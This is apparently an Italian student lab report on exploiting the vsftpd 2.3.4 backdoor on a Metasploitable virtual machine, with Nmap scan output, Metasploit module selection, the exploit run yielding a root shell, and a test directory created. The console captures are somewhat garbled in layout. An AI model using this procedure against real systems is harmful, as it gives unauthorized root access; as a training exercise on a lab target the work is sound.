Report eploit

Nell'esercizio di oggi dobbiamo sfruttare una vulnerabilità del protocollo FTP usando un exploit.

Prima di tutto specifichiamo che un exploit è un tipo di codice malevolo che sfrutta una vulnerabilità già presente in un sistema, non va ad inserirla lui stesso.

Lo scopo di un exploit è creare una connessione (shell) su un dispositivo target in modo da potervi accedere liberamente. Possiamo creare due tipi di shell: bind shell (la connessione ha direzione attaccante > taget) o reverse shell (direzione target > attaccante). La reverse shell è molto più comune, in quanto evita il problema di un eventuale stateful firewall (che blocca i pacchetti in ingresso, ma non quelli in uscita).

Come detto, andremo a sfruttare una vulnerabilità presente nel protocollo FTP, vale a dire un protocollo responsabile del trasferimento di file in rete (file transfer protocol, livello 4 del modello ISO/OSI).

Per prima cosa dobbiamo identificaer la versione del protocollo che usa la macchina target, in quanto ogni exploit è applicabile non solo ad uno specifico pogamma ma anche ad una specifica versione di quel programma. Usiamo quindi Nmap per ottenere la versione del protocollo FTP usata da Metasploitable.

```
Not shown: 977 closed tcp ports (conn-refused)
PORT
         STATE SERVICE
                           VERSTON
21/tcp
         open
               ftp
                            vsftpd 2.3.4
22/tcp
                            OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
         open
               ssh
23/tcp
         open
              telnet
                            Linux telnetd
                            Postfix smtpd
25/tcp
         open
               smtp
                           ISC BIND 9.4.2
53/tcp
         open
               domain
80/tcp
               http
                           Apache httpd 2.2.8 ((Ubuntu) DAV/2)
         open
               rpcbind
                            2 (RPC #100000)
111/tcp
         open
139/tcp
         open
               netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp
               netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
         open
512/tcp
                           netkit-rsh rexecd
         open
513/tcp
         open
               login?
514/tcp
         open
               shell
                            Netkit rshd
1099/tcp open
               java-rmi
                            GNU Classpath grmiregistry
               bindshell
                           Metasploitable root shell
1524/tcp open
2049/tcp open
               nfs
                            2-4 (RPC #100003)
2121/tcp open
                            ProFTPD 1.3.1
               ftp
3306/tcp open
               mysql
                           MySQL 5.0.51a-3ubuntu5
               postgresql PostgreSQL DB 8.3.0 - 8.3.7
5432/tcp open
5900/tcp open
                            VNC (protocol 3.3)
6000/tcp open
               X11
                            (access denied)
6667/tcp open
               irc
                            UnrealIRCd
                            Apache Jserv (Protocol v1.3)
Apache Tomcat/Coyote JSP engine 1.1
8009/tcp open
               ajp13
8180/tcp open
               http
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix,
Linux; CPE: cpe:/o:linux:linux_kernel
```

Una volta ottenuta, andiamo a vedere quali sono gli exploit disponibili per la versione in questione. Vediamo nell'imaggine sotto che ne esiste uno solo, quindi lo selezioniamo con il comando "use".

```
msf6 > search vsftpd
Matching Modules
  # Name
                                            Disclosure Date Rank
                                                                        Check Descri
ption
  0 auxiliary/dos/ftp/vsftpd_232
                                            2011-02-03
                                                             normal
                                                                               VSFTPD
                                                                        Yes
 2.3.2 Denial of Service
                                                                               VSFTPD
  1 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03
                                                             excellent No
 v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 1, use 1 or use exploit/uni
```

Guardando tra le opzioni dell'exploit vediamo che è richiesto l'indirizzo IP della macchina target (senza di esso Metasploit non saprebbe quale macchina attaccare).

Configuriamo quindi l'exploit con l'indirizzo IP target.

```
msf6 exploit(
                                         r) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
   Name
            Current Setting Required Description
   CHOST
                                       The local client address
                                       The local client port
   CPORT
                             no
   Proxies
                                       A proxy chain of format type:host:port[,type
                                       :host:port][ ... ]
           192.168.1.149
                                       The target host(s), see https://docs.metaspl
   RHOSTS
                             yes
                                       oit.com/docs/using-metasploit/basics/using-m
                                       etasploit.html
   RPORT
            21
                                       The target port (TCP)
                             yes
```

A questo punto dobbiamo scegliere il payload dell'exploit, ovvero le istruzioni che porteranno alla creazione della shell sul dispositivo attaccato. Come per l'exploit, anche in questo caso possiamo verificare quanti possibili payload esistono per una determinata versione di un programma (anche in questo caso è presente un solo payload).

Selezioniamo quindi il payload con il comando "set" e siamo pronti a lanciare l'exploit. Vediamo che l'attacco ha avuto successo e abbiamo creato una shell sul dispositivo target.

```
Unknown datastore option: payload/cmd/unix/interact.
Usage: set [options] [name] [value]
Set the given option to value. If value is omitted, print the current value.
If both are omitted, print options that are currently set.
If run from a module context, this will set the value in the module's
datastore. Use -g to operate on the global datastore.
If setting a PAYLOAD, this command can take an index from `show payloads'.
OPTIONS:
    -c, --clear Clear the values, explicitly setting to nil (default)
-g, --global Operate on global datastore variables
    -h, --help
                 Help banner.
                     n/weftnd 234 backdoor) > exploit
msf6 exploit(unix/
[*] 192.168.1.149:21 - Banner: 220 (vsFTPd 2.3.4)
   192.168.1.149:21 - USER: 331 Please specify the password.
[+] 192.168.1.149:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.149:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
   Command shell session 1 opened (192.168.1.100:38259 → 192.168.1.149:6200) at 202
3-11-06 15:13:55 +0100
```

Ora che siamo dentro al sistema taget possiamo muoverci dentro al sistema, aprire file e directory, scalare privilegi ecc...

Creiamo una cartella su Metasploitable usando la shell, quindi dalla nostra macchina attaccante Kali.

```
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.1.149:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.149:21 - USER: 331 Please specify the password.
[+] 192.168.1.149:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.149:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.100:38259 → 192.168.1.149:6200) at 202 3-11-06 15:13:55 +0100

pwd
/
mkdir test_metasploit
```

Ci spostiamo quindi su Metasploitable e verifichiamo che la nuova directory sia presente.

```
msfadmin@metasploitable:~
msfadmin@metasploitable:~$ cd
msfadmin@metasploitable:/$ ls
msfadmin@metasploitable:~
                             cd /
       dev
             initrd
                            lost+found
                                         nohup.out root sys
bin
boot
       etc
              initrd.img media
                                                     sbin test_metasploit var
                                         opt
       home
drom
                                         proc
                                                      srv
```